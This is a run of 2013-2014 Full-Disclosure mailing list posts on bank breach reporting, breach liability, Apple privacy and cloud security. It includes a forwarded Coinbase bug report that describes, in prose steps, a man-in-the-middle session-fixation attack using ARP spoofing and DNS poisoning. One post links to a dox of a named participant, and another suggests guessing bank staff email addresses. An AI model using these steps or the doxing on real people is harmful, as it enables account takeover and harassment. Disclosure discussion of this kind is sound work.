Re: [Full-disclosure] Bank of the West security contact?
On Mon, Mar 17, 2014 at 12:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Mar 17, 2014 at 12:15 PM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote: Just wanted to post a follow-up to this and provide some context to make it known: * Bank of the West was contacted in 2011 to report a security issue * No response for 2 years * In late 2013, I receive a breach notification saying my own sensitive personal information was compromised via the EXACT SAME ISSUES I REPORTED. I also am led to believe employee information was compromised, which may include Social Security Number (SSN) details. Conclusions? * Bank of the West has NO WORKING SECURITY REPORTING MECHANISM for outside researchers and NO BUG BOUNTY PROGRAM * Bank of the West does not seem to take security and privacy seriously enough, as far as I can tell You should know this if you are an existing or potential customer / employee of Bank of the West... The risk equations favor do nothing. Its cost effective to simply persue profits and not spend money on data security. If (when) they are breached, it only costs them the cost of a notification. In the US, that's the cost of bulk mail [0]. 46 states, DC, and Territories have Data Breach laws, and nearly none (none?) have any useful provisions for damages. [1] You can't recover for your time lost or services like credit monitoring. Every class action get tossed out [2]. I've never seen one go to court, and I've been watching them for years. I might just stand corrected here (if it withstands appeal): http://www.slyck.com/story2351_Data_Breach_Settlement_Class_Action_Lawsuit_Wins_Appeal_in_Court: With so many recent data breaches and lacking security measures in place, we know that there are likely to be many more lawsuits forthcoming. However, in what’s believed to be a first win for a class action lawsuit as a result of a data breach where none of the plaintiffs suffered identify theft or direct losses, AvMed, a Florida-based health insurer, lost its case in court to the tune of a $3 million settlement agreement. On February 21, 2014, a federal judge in the Southern District of Florida approved an Order granting motion for final approval of a Class Action Settlement Agreement, and filed a motion for attorneys' fees and expenses, as well as for incentive awards. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Mon, Mar 17, 2014 at 12:15 PM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote: Just wanted to post a follow-up to this and provide some context to make it known: * Bank of the West was contacted in 2011 to report a security issue * No response for 2 years * In late 2013, I receive a breach notification saying my own sensitive personal information was compromised via the EXACT SAME ISSUES I REPORTED. I also am led to believe employee information was compromised, which may include Social Security Number (SSN) details. Conclusions? * Bank of the West has NO WORKING SECURITY REPORTING MECHANISM for outside researchers and NO BUG BOUNTY PROGRAM * Bank of the West does not seem to take security and privacy seriously enough, as far as I can tell You should know this if you are an existing or potential customer / employee of Bank of the West... The risk equations favor do nothing. Its cost effective to simply persue profits and not spend money on data security. If (when) they are breached, it only costs them the cost of a notification. In the US, that's the cost of bulk mail [0]. 46 states, DC, and Territories have Data Breach laws, and nearly none (none?) have any useful provisions for damages. [1] You can't recover for your time lost or services like credit monitoring. Every class action get tossed out [2]. I've never seen one go to court, and I've been watching them for years. In the US, the risk equations must be unbalanced (or swayed to favor of the consumer, who is the ultimate victim). That will take a policy change. However, that likely won't happen as long as corporate america and special interest purchase and trade politicians like sports trading cards. (I've been watching data breaches and responses for years because I got burned somehow and it cost me over 10K to fix in the 1990s. I never got a notification. I found out after I got sued for unpaid bills and the collection agencies contacted me). Jeff [0] http://pe.usps.com/businessmail101/rates/welcome.htm [1] State Security Breach Notification Laws, http://www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx [2] Once Again, Clapper Defeats Data Breach Class Action, http://www.mondaq.com/unitedstates/x/294324/Data+Protection+Privacy/Once+Again+Clapper+Defeats+Data+Breach+Class+Action ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Re: Bank of the West security contact?
On Sun, Feb 9, 2014 at 5:34 PM, Justin Ferguson j...@ownco.net wrote: Ftr record folks, this is the level that booz Allen et al and the RCMP are at as a failed entrapment attempt. Surely you can do better than that... On Feb 9, 2014 11:53 AM, doxingtheidi...@hushmail.com wrote: Justin - I think we're all pretty tired of your lack of maturity. There's a reason why you're no longer at IOActive, and I think its about time everyone knew the real you. Doing a Google search on you turned up quite a bit of interesting information, including this dox on you by the people you burned a few years back when you were trying to become a member of Anonymous with all your conspiracy theories: http://dumpz.org/218006/text/ Oh, and I think we will all get a kick out of your photos: http://s1306.photobucket.com/user/doxingtheidiots/library/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
RFC 2142 offers a number of well known mailboxes that should be monitored. Tyr secure@, security@, and support@. WHOIS offers technical and administrative contacts. $ whois bankofthewest.com Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: BANKOFTHEWEST.COM Registrar: NETWORK SOLUTIONS, LLC. Whois Server: whois.networksolutions.com Referral URL: http://www.networksolutions.com/en_US/ Name Server: A1.VERISIGNDNS.COM Name Server: A2.VERISIGNDNS.COM Name Server: A3.VERISIGNDNS.COM Name Server: DNS1.BANKOFTHEWEST.COM Name Server: DNS2.BANKOFTHEWEST.COM Name Server: DNS3.BANKOFTHEWEST.COM Name Server: DNS4.BANKOFTHEWEST.COM Status: clientTransferProhibited Updated Date: 13-jul-2013 Creation Date: 23-jan-1996 Expiration Date: 24-jan-2020 Last update of whois database: Sat, 08 Feb 2014 09:19:03 UTC NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to ... The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: BANKOFTHEWEST.COM Registry Domain ID: Registrar WHOIS Server: whois.networksolutions.com Registrar URL: http://www.networksolutions.com/en_US/ Updated Date: 2011-01-04T00:00:00Z Creation Date: 1996-01-23T00:00:00Z Registrar Registration Expiration Date: 2020-01-25T00:00:00Z Registrar: NETWORK SOLUTIONS, LLC. Registrar IANA ID: 2 Registrar Abuse Contact Email: ab...@web.com Registrar Abuse Contact Phone: 800-333-7680 Reseller: Domain Status: clientTransferProhibited Registry Registrant ID: Registrant Name: the West, Bank of Registrant Organization: Bank of the West / William Scanlin Registrant Street: 2527 Camino Ramon Registrant City: San Ramon Registrant State/Province: CA Registrant Postal Code: 94583 Registrant Country: US Registrant Phone: (925) 843-2358 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: regist...@bankofthewest.com Registry Admin ID: Admin Name: the West, Bank of Admin Organization: Bank of the West / William Scanlin Admin Street: 2527 Camino Ramon Admin City: San Ramon Admin State/Province: CA Admin Postal Code: 94583 Admin Country: US Admin Phone: (925) 843-2358 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: regist...@bankofthewest.com Registry Tech ID: Tech Name: the West, Bank of Tech Organization: Bank of the West / William Scanlin Tech Street: 2527 Camino Ramon Tech City: San Ramon Tech State/Province: CA Tech Postal Code: 94583 Tech Country: US Tech Phone: (925) 843-2358 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: regist...@bankofthewest.com Name Server: DNS1.BANKOFTHEWEST.COM Name Server: DNS2.BANKOFTHEWEST.COM Name Server: DNS3.BANKOFTHEWEST.COM Name Server: DNS4.BANKOFTHEWEST.COM Name Server: A1.VERISIGNDNS.COM Name Server: A2.VERISIGNDNS.COM Name Server: A3.VERISIGNDNS.COM DNSSEC: not signed URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ Last update of whois database: Sat, 08 Feb 2014 09:19:03 UTC The data in Networksolutions.com's WHOIS database ... On Sat, Feb 8, 2014 at 12:27 AM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote: Anyone have security contact at Bank of the West? -- Kristian Erik Hermansen https://www.linkedin.com/in/kristianhermansen https://profiles.google.com/kristian.hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 6:05 AM, Justin Ferguson j...@ownco.net wrote: well, not to be outdone by the RFC parroting and amazing whois. If you google @bankofthewest.com or (at)bankofthewest(dot)com you'll pull a bazillion email addresses that you can spam. Alternatively c...@bankofthewest.com c...@bankofthewest.com or kirsten.ga...@bankofthewest.com or duke.da...@bankofthewest.com as firstname.lastn...@bankofthwest.com is the apparent format. That said, unlike turbo here, I recognize you're looking for confirmed contacts, and I don't have any there. He thought you possibly didn't know how to whois, I suggested to him that he could also look up their CSR number in the phone book, because perhaps you didn't know how to do that either; of course, American banks don't actually get that +1 is a country code.. so, yeah. You should also provide some of that crack legal advice, too. Jeff On Sat, Feb 8, 2014 at 5:45 AM, Jeffrey Walton noloa...@gmail.com wrote: On Sat, Feb 8, 2014 at 12:27 AM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote: Anyone have security contact at Bank of the West? You might also try reaching out to Justin Ferguson. The impression I got is he is masterful at infosec; and he can probably put you in touch with someone in about 3 degrees - perhaps even 1 (that beats the snot out of six degrees for other famous people). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 6:05 AM, Justin Ferguson j...@ownco.net wrote: well, not to be outdone by the RFC parroting and amazing whois. If you google @bankofthewest.com ... Google does not allow you to search for the '@' symbol. https://productforums.google.com/forum/#!topic/websearch/Dj-lKNCKK8o. That's why there are email harvesters out there. Perhaps you were using the amphora symbol, or you meant bankofthewest.com. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 7:05 AM, Justin Ferguson j...@ownco.net wrote: Google does not allow you to search for the '@' symbol. funny, there is a marked difference between when you search for domain.com and @domain.com, one of which is that it includes a lot of email addresses. Google is even so kind as to link in common email address distortions. Try before you speak please, turbo. Oh, got it. Google's policies and rules don't apply to you. Silly me. You'll have to forgive me. I'm a slow learner at times. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 7:11 AM, Justin Ferguson j...@ownco.net wrote: ... You'll have to forgive me. I'm a slow learner at times. probably because, per you, you dont read webpages due to evil ToS' .. That's not what I said when you were trolling offline. You could cite it if you'd like. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 7:17 AM, Justin Ferguson j...@ownco.net wrote: That's not what I said when you were trolling offline. You could cite it if you'd like. its cool, i actually didnt click reply-all for a reason. you elected to go for group consensus, old one. I thought it was selfish keeping your cornucopia of knowledge to myself. Hence the reason I suggested Kristian engage you. Jeff On Sat, Feb 8, 2014 at 7:14 AM, Jeffrey Walton noloa...@gmail.com wrote: On Sat, Feb 8, 2014 at 7:11 AM, Justin Ferguson j...@ownco.net wrote: ... You'll have to forgive me. I'm a slow learner at times. probably because, per you, you dont read webpages due to evil ToS' .. That's not what I said when you were trolling offline. You could cite it if you'd like. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 11:32 AM, Daniel Wood daniel.w...@owasp.org wrote: Keep this list professional guys. I hate seeing it turn into an IRC chat room. Justin, you should really stop this type of behavior, you're not doing yourself any favors. I let it go when you decided you wanted to repeatedly bash me privately over one of my CVE's posted here, however I can see it's starting to look like a pattern for you. http://www.collegehumor.com/video/5817726/internet-bridge-troll Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] EE BrightBox router hacked - bares all if you ask nicely
On Thu, Jan 16, 2014 at 12:44 PM, valdis.kletni...@vt.edu wrote: On Thu, 16 Jan 2014 11:30:18 +, Dan Ballance said: So your point is that there should be legislation to require companies to adhere to certain security standards? I'd support that - particularly in an ISP market which is clearly defined by national boundaries and law. OK.. What standard do you want to hoist as a legal mandate? No standards are needed. Attach a nominal dollar amount to the data. That will unbalance the risk equations and the industry will act on its own. For example, if it takes 2 hours to reset to all your passwords (password reuse is rampant), then allow a consumer to recover $250 for their time. If PII is lost allow them damages of 7 years of credit reporting (about $150) plus actual damages from any loss. Hell, I had to overnight a credit card last summer while on business that was cancelled due to a breach. That cost me $75.00. Perhaps triple damages are in order, too. Bonus points for finding a standard that provides enough *actual* security that it is worth doing... +1 ... but yet won't bankrupt the industry. Computing is a privilege, not a right. Should Sony continue to be allowed to compute when they suffered at least 50 incidents, including dataloss (http://attrition.org/security/rants/sony_aka_sownage.html)? Hell, Sony suffered 7 different incidents in one month (http://www.thetechherald.com/article.php/201121/7185/Seven-security-incidents-in-two-months-Sony-s-nightmare-grows). How much time an aggravation have they caused to institutions and consumers? That's driving drunk on the information superhighway. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] EE BrightBox router hacked - bares all if you ask nicely
On Wed, Jan 15, 2014 at 3:28 PM, Scott Helme scotthe...@hotmail.com wrote: The BrightBox router is the standard equipment issued by UK ISP Everything Everywhere (EE) to its subscribers. The device not only leaks sensitive data but is remotely exploitable too. An attacker even has the ability to take control of your account as the router leaks your ISP account credentials. You can read the full article here: https://scotthelme.co.uk/ee-brightbox-router-hacked/ To add insult to injury, they are probably using a hard code public key pair, and its probably in the littleblackbox (http://code.google.com/p/littleblackbox/). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Where are you guys standing re: the (full) disclosure
On Fri, Dec 13, 2013 at 12:28 PM, Gary Baribault g...@baribault.net wrote: Rather harsh don't you think? I'm all for OSS but I have expenses and need to make money. Yes M$ makes money, but I think their ethical just as much as any other company .. is IBM ethical? Is HP ethical? Is Dell (the company) ethical? They all are to some degree. Try Apple. They withhold security updates until the press release for their latest iOS version. See, for example, the hundred of fixes in https://lists.apple.com/archives/security-announce/2012/Sep/msg3.html. At least Microsoft patches on a regular basis. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Seems like Coinbase Security Team doesn't know how their cookie works
While i don't see the point of saving the csrf token in a cookie i must say that in every fucking programming book there is written that tokens should be regenerated after logins. Or maybe i am just crazy or there are some other factors i did not considered? Cookies don't completely remediate Injections and CSRF (as you can see). You really only have two defenses: fix the injection or re-authenticate the user during high value transactions. For the later, challenge them with their password to ensure they initiated the transaction. Jeff On Fri, Nov 29, 2013 at 11:24 AM, giu...@anche.no wrote: During last summer i wrote them a report with the following content. I was not expecting a reward because my poc could work only in Man In The Middle scenarios and only under certain circumstances, but at least i was expecting a good reply and a fix. Here is what i wrote them Hi, i do not know if this type of vulnerability may qualify for your bug bounty but it's in someway exploitable and it was funny to think on. Firstly please excuse me if i'm not so clear as you may hope because english is not my native language. This proof of concept works in a scenario where a malicious attacker can perform a man in the middle attack on the victim (like a public hotspot, a university network etc.). Here is an example of attack: 1) Attacker visit conibase.com and grab a normal session cookie (_coinbase_session), which is base64 encoded and contains both a 'session_id' and a '_csrf_token' values. 2) Attacker start a webserver on localhost which set the cookie grabbed before for coinbase.com domain. 3) Attacker start DNS poisoning trough ARP spoofing on the victim pointing coinbase.com to his own box. 4) Attacker start a code injection trough ARP spoofing and inject an hidden iframe that point to coinbase.com which now resolve to his box. 5) The victim visits any random non-SSL website and the _coibase_session is set by the attacker. 6) As soon as the victim visit a non-SSL website at least one time the attacker stops DNS Spoofing and point coinbase.com to its original server. 7) The victim logs in (or logs in again if he was previously logged). 8) The attacker can now inject perfectly crafted post or get requests using the csrf_token he previously set for the victim. 9) As soon as the victim visit a random non-SSL website and is still logged in the attacker can perfom the actions he wants on his account. The advantage is a sort of 'SSL bypass' since the user in theory has no why to defend or notice this attack. I know and understand that is really tricky to do but i worked on this and at least i wanted to share it :) 0A simple fix would just be to regenerate the csrf_token once the user logs in but i'm sure you'll find a better why. The only thing that i didn't mention here is that they have an HSTS policy so this may have worked only with users with haven't visit coinbase with the browser they're using before. I got this response Thank you for the disclosure, we appreciate it. I have only looked at it briefly by now but doesn't the secure flag on the session cookie prevent from leaking the csrf token or any injection at all. kind regards, [removed] and replied with Hi, I think that's not true. Actually the point is that we are impersonating the domain in order to set an already known _coinbase_session. It is possible to set cookie with 'secure' flag trough HTTP while as you said is not obviously possible to read it, but since we're defining it we already know it. I hope now is more clear. Thank you. They replied interesting. and how would you get around the browsers cert warning if you mitm arp/dns spoof the domain? Replies: Writing a script that detect when the user start browsing a non-SSL website and when it returns true it starts dns spoofing and injecting the iframe which load http://coinbase.com, which set the cookie. As soon as the user load the iframe at least one time the dns poisoning stops and user shouldn't notice anything. I'm actually writing a tool to automatize this process because most sites seems vulnerable. So yes, if the victim browse only coinbase.com and do nothing else before login or before signing out this doesn't work but i think in most cases this won't happen. Their reply so what you are really saying is that the csrf token is shared among secure and non secure cookie our app sets. because if the user browser coinbase.com(http) it would not net the same cookie with the secure flag like it does when you get redirected to https Actually i did not completely undertood that statement, probably because of my english, anyway i replied with Normally a session fixation consists in setting a known session cookie for the victim, so instead of trying to grab a valid sessions we simply force the user to validate the one we provided. This can be achieved performing the dns
Re: [Full-disclosure] iCloud and privacy...last word
And don't forget Apple's own lawyers tell us it can't be trusted: A layman’s analysis of License Agreements and Terms and Conditions reveals how little security is afforded to your documents in cloud storage and backup to the cloud. For those who don’t read them, one popular platform has 142 separate documents covering Terms of Conditions for its cloud alone.[1] The documents discuss your rights if the company (1) gives away your data, (2) shares you data with partners, (3) looses your data, (4) provides your data to authorities (sometimes without an order or warrant), (5) does not provide reasonable skill or care, (6) commits willful misconduct or fraud, and (7) acts with negligence or gross negligence. “Your rights” is misleading since it is consent, and the document effectively states you indemnify the company: “You agree to defend, indemnify and hold Apple, its affiliates, subsidiaries, directors, officers, employees, agents, partners, contractors, and licensors harmless from any claim or demand, including reasonable attorneys’ fees, made by a third party.”[2] [1] iCloud Terms and Conditions, https://www.apple.com/legal/internet-services/icloud/ww/ [2] iCLOUD TERMS AND CONDITIONS, https://www.apple.com/legal/internet-services/icloud/en/terms.html On Thu, Nov 28, 2013 at 8:21 AM, silence_is_b...@hushmail.com wrote: Apple Discussions has a large portion of people dead set on making sure everyone knows that iCloud data is different then your other data. I disagree...follow you're data: http://www.apple.com/privacy Here are some examples of the types of personal information Apple may collect and how we may use it. What: we may collect a variety of information, including your name, mailing address, phone number, email address, contact preferences, and credit card information. When you share your content with family and friends using Apple products, send gift certificates and products, or invite others to join you on Apple forums, Apple may collect the information you provide about those people such as name, mailing address, email address, and phone number. Somy info and any info about friends...gotcha. How they use/share: It also helps us to improve our services, content, and advertising. You may be asked to provide your personal information anytime you are in contact with Apple or an Apple affiliated company. Apple and its affiliates may share this personal information with each other and use it consistent with this Privacy Policy. They may also combine it with other information to provide and improve our products, services, content, and advertising. iCloud: http://support.apple.com/kb/HT4865 the Pièce de résistance: This article explains how iCloud keeps your personal information and data secure. In addition to this article, you should also review Apple’s Privacy Policy, which covers iCloud. Yea last word on thisuse iCloud, share your stuff with Apple and their affiliates...and done! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Another Apple Security Failure (Apple Mail on the iPhone)....
On Fri, Nov 15, 2013 at 12:23 AM, Caspian Kilkelly casp...@random-interrupt.org wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What version of IOS was this? I'm looking into something similar on other apple platforms, but it doesn't seem consistently repeatable. iOS 7.0.3 (11B511) on a iPhone 4 (MD146LL/A). Jeff On 13-11-11 6:41 PM, Jeffrey Walton wrote: My iPhone does not store sensitive information. Its a phone an music player only. (I'm not sure it could save sensitive information if I needed it, as the following demonstrates). About 6 weeks ago, a colleague was having trouble adding an email account to his iPhone and sending email. I allowed him to add his account to my iPhone for testing. After testing, we deleted the account. My colleague was having trouble with Apple iPhone mail again this week. This time, I added my account to the phone. I used my account because he's remote and I don't want his password. Note: we use the same incoming and outgoing email servers. After running the setup wizard, my outgoing server was populated with his email credentials - both username and password. So much for deleting that username and password about 6 weeks ago. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Another Apple Security Failure (Apple Mail on the iPhone)....
My iPhone does not store sensitive information. Its a phone an music player only. (I'm not sure it could save sensitive information if I needed it, as the following demonstrates). About 6 weeks ago, a colleague was having trouble adding an email account to his iPhone and sending email. I allowed him to add his account to my iPhone for testing. After testing, we deleted the account. My colleague was having trouble with Apple iPhone mail again this week. This time, I added my account to the phone. I used my account because he's remote and I don't want his password. Note: we use the same incoming and outgoing email servers. After running the setup wizard, my outgoing server was populated with his email credentials - both username and password. So much for deleting that username and password about 6 weeks ago. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cloud Questions
On Fri, Nov 8, 2013 at 9:08 AM, David Miller dmil...@metheus.org wrote: ... I don’t think I’ve seen a single post about cloud security. Is ‘the cloud’, AWS in particular, believed to be secure? Is it simply not targeted? Stallman has a term for it: Careless Computing. http://techcrunch.com/2010/12/14/stallman-cloud-computing-careless-computing/. Or would it be covered by some other list? Inquiring minds are, uh, inquiring. The only list I've seen so far is OpenStack's security list. http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-security. From what I've seen, cloud security seems to have three broad tracks (in addition to all the secure coding and HTML app stuff). First is low-level security that acts on block devices, like Amazon's CloudHSM and other who focus on VM security. Second is high level security that attempts to secure databases (table fields) and object stores (Amazon S3 and OpenStack Swift), like CipherClod and Armor-Cloud. And third is identity management, like the federated and single sign-on integrations. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cloud Questions
The first problem is TCO. Cloud services are easy to set up (both as a vendor and as a user), and have little to no hard start-up costs. (costs that initially are billed as startup costs, before the service payments start). Also see http://www.gossamer-threads.com/lists/openstack/dev/32772, where some are considering charging you for the I/O to securely delete a VM! Jeff On Sat, Nov 9, 2013 at 9:50 AM, Yvan Janssens i...@yvanj.me wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Hello, I will split my answer in two parts, as they represent both views I regularly experience. They aren't all related to security. The first problem is TCO. Cloud services are easy to set up (both as a vendor and as a user), and have little to no hard start-up costs. (costs that initially are billed as startup costs, before the service payments start). This results in decisions which aren't really thinked throughly about in a lot of cases, resulting in poor setups both by the vendor and by the end-user/customer. Being able to ship fast also means that you can make mistakes fast - several providers have been caught in the past while I was using them on blatant mistakes. Another problem is that you trust a service to a third party provider, which has full access to the data. I know, there are ways to prevent this/make this difficult, but in the end it will not be feasible on the long term to employ such techniques. Targeted attacks will always succeed, but are easier on cloud services to my opinion. Support services are useful sources for social engineering (check some of the last cases of DNS hijacking), since they are used to handle requests for all customers, and not only internal employees. The other problem is that you share a physical computer with someone you don't know and cannot trust. Information leakage techniques have been discovered [1] and it wouldn't be the first time that someone finds a clever way to break out of the VM. [2] It is also more feasible to DoS your application if the physical hardware is shared with others if they aren't trustworthy. Most providers monitor extensive resource usage, but try a cheap one, put a VM on full RAM capacity, disk I/O requests and CPU usage and see how long it takes to get a notice to ask you to inspect the machine. There is also a huge thing to tell about stuff which used to be conspiracy theories about surveillance, but this is out of scope for this response to avoid indulging trolling. To my opinion cloud services are good for a temporarily burst of CPU resources, not to store data, and not to be used permanently nor as a SPOF. I sometimes use cloud services to launch a build of a large source tree, and then dispose the machine, but I would never put ownCloud on it to store PGP private keys without a password or my credit card numbers and bank PINs. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cloud Questions
On Sat, Nov 9, 2013 at 9:51 AM, silence_is_b...@hushmail.com wrote: On 11/09/2013 at 7:32 AM, David Miller dmil...@metheus.org wrote: I’ve been lurking here for some months now and have seen plenty of vulnerabilities go by for applications, and the occasional OS level exploit. I don’t think I’ve seen a single post about cloud security. Is ‘the cloud’, AWS in particular, believed to be secure? Is it simply not targeted? Or would it be covered by some other list? Inquiring minds are, uh, inquiring. TIA, — David There is no such thing as cloud security (to me at least). Companies may transfer/store encrypted, but if the NSA/law enforcement ask for it, they give it up. That's not secure to me..that's moredata held hostage (iCloud anyone?). I think you are right in that good bad guys (law enforcement) bad bad guys (cyber-criminals) attack the node. In this case, the node is the cloud provider. But it also depends on what the data is. I have no faith in CloudHSM, HighCloud or other low level machinery. That's the unattended key storage problem, and its a problem without a solution. Plus, the data becomes available as soon as the VM is powered on. Objects in storage (Amazon S3 or OpenStack Swift) can be encrypted using standard crypto methods with minimal risk. The encryption function will act like a PRP, and the cipher text will be indistinguishable from random. Minimal risk would include leaking the origin (LE probably has that through the account) and leaking file size (unless specific measures are taken). If the owner of the document wants anonymity, they should probably use a Tor hidden service. Other higher level services, like SaaS and DaaS, probably won't fair so well. Those tokenization schemes used for database field encryption by CipherCloud do not live up to expectations. It probably wanders near false/misleading and fraud, and the FTC should investigate some of their claims (unless CipherCloud have a homomorphic encryption system that no one knows about). As a matter of fact, when an informal security analysis was performed and posted to StackExchange, CipherCloud issued a DRM takedown! https://www.google.com/search?q=ciphercloud+drm+takedown. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mavericks...less then a bargin?
On Mon, Oct 28, 2013 at 4:49 PM, Joel Esler joel.es...@me.com wrote: Obviously they expect you to surrender the info in the sake of simplicity and usefulness. They swear the can't read your stuff: http://www.apple.com/apples-commitment-to-customer-privacy/ :) Their own legal department tells us they are not trustworthy. Who do we believe: their legal department, or their press release? Jeff On Oct 28, 2013, at 03:30 PM, PuNkErX w punk...@hotmail.com wrote: I usually lurk the list but here's my take on it. Using iCloud to sync everything is stupid if you care about privacy. Unless you don't mind all your info (especially now that you can sync the keychain) being out there. As an old Apple fanboy Im disgusted but not surprised with the direction they went. Thats why i got out of the Apple work when 10.7 dropped. I host an old macbook with 10.6 server that has iCal and address book services to sync stuff between 10.9 laptop, 10.6 laptop, iphone and ipad. It works for what i need but obviously it isnt for everyone. Im looking at other alternatives for all in one type deals but it seems every cloud service pretty much sells your info in one shape way or form. So you dont need to use icloud at all but it appears you will need a third party server to sync stuff. Yet another step back asswards for the industry. On Oct 28, 2013, at 10:43, silence_is_b...@hushmail.com wrote: The functionality of syncing contacts/calendar is MISSING in iTunes...gone...poof...Casper...out of luckplug in your iDevice on the latest, then check it out...you can sync photos and music, but nothing else...it's a bad scene. On Monday, October 28, 2013 at 8:34 AM, Joel Esler joel.es...@me.com wrote: What happens when you refuse to sign up for iCloud? sent from my iCloud account -- Joel Esler On Oct 28, 2013, at 08:09 AM, silence_is_b...@hushmail.com wrote: A warning (disclosure) to you Apple peopleif you're planning to sync your shiny iDevice with Mavericks, you will be FORCED to use iCloud (syncing from your iDevice to your iPuter is now gone). I suspect this is one of the reasons why Mavericks was a free upgrade. Apple probably figured the $40 they'd get from the sale of the OS is less then when they'd get with have your calendar and your contacts within easy reach. Per their policy: What personal information we collect When you create an Apple ID, register your products, apply for commercial credit, purchase a product, download a software update, register for a class at an Apple Retail Store, or participate in an online survey, we may collect a variety of information, including your name, mailing address, phone number, email address, contact preferences, and credit card information. When you share your content with family and friends using Apple products, send gift certificates and products, or invite others to join you on Apple forums, Apple may collect the information you provide about those people such as name, mailing address, email address, and phone number. How we use your personal information The personal information we collect allows us to keep you posted on Apple’s latest product announcements, software updates, and upcoming events. It also helps us to improve our services, content, and advertising. Nice not to have choices ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iOS: List of available trusted root certificates (iOS 7)
